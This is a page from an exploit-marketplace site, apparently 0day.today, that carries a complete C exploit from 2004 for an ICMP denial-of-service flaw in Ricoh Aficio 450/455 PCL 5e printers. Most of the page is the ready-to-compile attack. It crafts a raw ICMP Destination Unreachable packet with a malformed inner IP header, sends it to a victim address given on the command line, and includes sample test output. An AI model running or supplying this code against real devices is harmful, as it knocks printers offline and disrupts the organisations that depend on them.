0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit
[==================================================================
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit
==================================================================
/*
* RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit.
* DATE: 12.15.2004
* Vuln Advisory : Hongzhen Zhou<felix__zhou _at_ hotmail _dot_ com>
* Exploit Writer : x90c(Kyong Joo)@www.chollian.net/~jyj9782
*
* Testing -----------------------------------------------
* root@testbed:~/raw# gcc -o rpcl_icmpdos rpcl_icmpdos.c
* root@testbed:~/raw# ./rpcl_icmpdos
* Usage: ./rpcl_icmpdos <victim>
* root@testbed:~/raw# ./rpcl_icmpdos 192.168.2.4
* exploit sent ok() = ..x-_-x..
* root@testbed:~/raw#
*
*/
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<linux/ip.h>
#include<linux/icmp.h>
unsigned short cksum(unsigned short *buf, int len);
struct icmp_packet{
struct icmphdr icmp;
struct iphdr inip;
unsigned char bigger[90]; // STEP1: Bigger Data(ICMP Header(8)+ inip(20) + 90(bigger data))
} packet;
/* ########################
* # Entry Point #
* ########################
*/
int main(int argc, char *argv[]){
struct sockaddr_in ca;
int sockfd, ret;
if(argc<2){
printf("Usage: %s <victim>\n", argv[0]);
exit(-1);
}
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
memset(&packet, 0, sizeof(packet));
packet.icmp.type = 3; // STEP2: Destination Unreachable.
packet.icmp.code = 1;
packet.icmp.un.echo.id = getpid();
packet.icmp.un.echo.sequence = 0;
packet.inip.ihl = 5;
packet.inip.version = 4;
packet.inip.tot_len = htons(20);
packet.inip.id = htons(9090);
packet.inip.ttl = 90;
packet.inip.protocol = IPPROTO_TCP; // STEP3: IPPROTO_UDP also useable.
packet.inip.saddr = inet_addr("127.0.0.1");
packet.inip.daddr = inet_addr("127.0.0.1");
packet.inip.check = (unsigned short) cksum((unsigned short *)&packet.inip, 20);
packet.icmp.checksum = cksum((void *)&packet, sizeof(packet));
memset(&ca, 0, sizeof(ca));
ca.sin_family = AF_INET;
ca.sin_addr.s_addr = inet_addr(argv[1]);
if((sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&ca, sizeof(ca))) == sizeof(packet))
printf("exploit sent ok() = ..x-_-x..\n");
else
printf("exploit sent failed() = ..o^O^o..\n");
close(sockfd);
}
/* ########################
* # Internet Checksum #
* ########################
*/
unsigned short cksum(unsigned short *buf, int len){
register unsigned long sum;
for(sum = 0; len > 0; len--) sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
# 0day.today [2024-11-16] #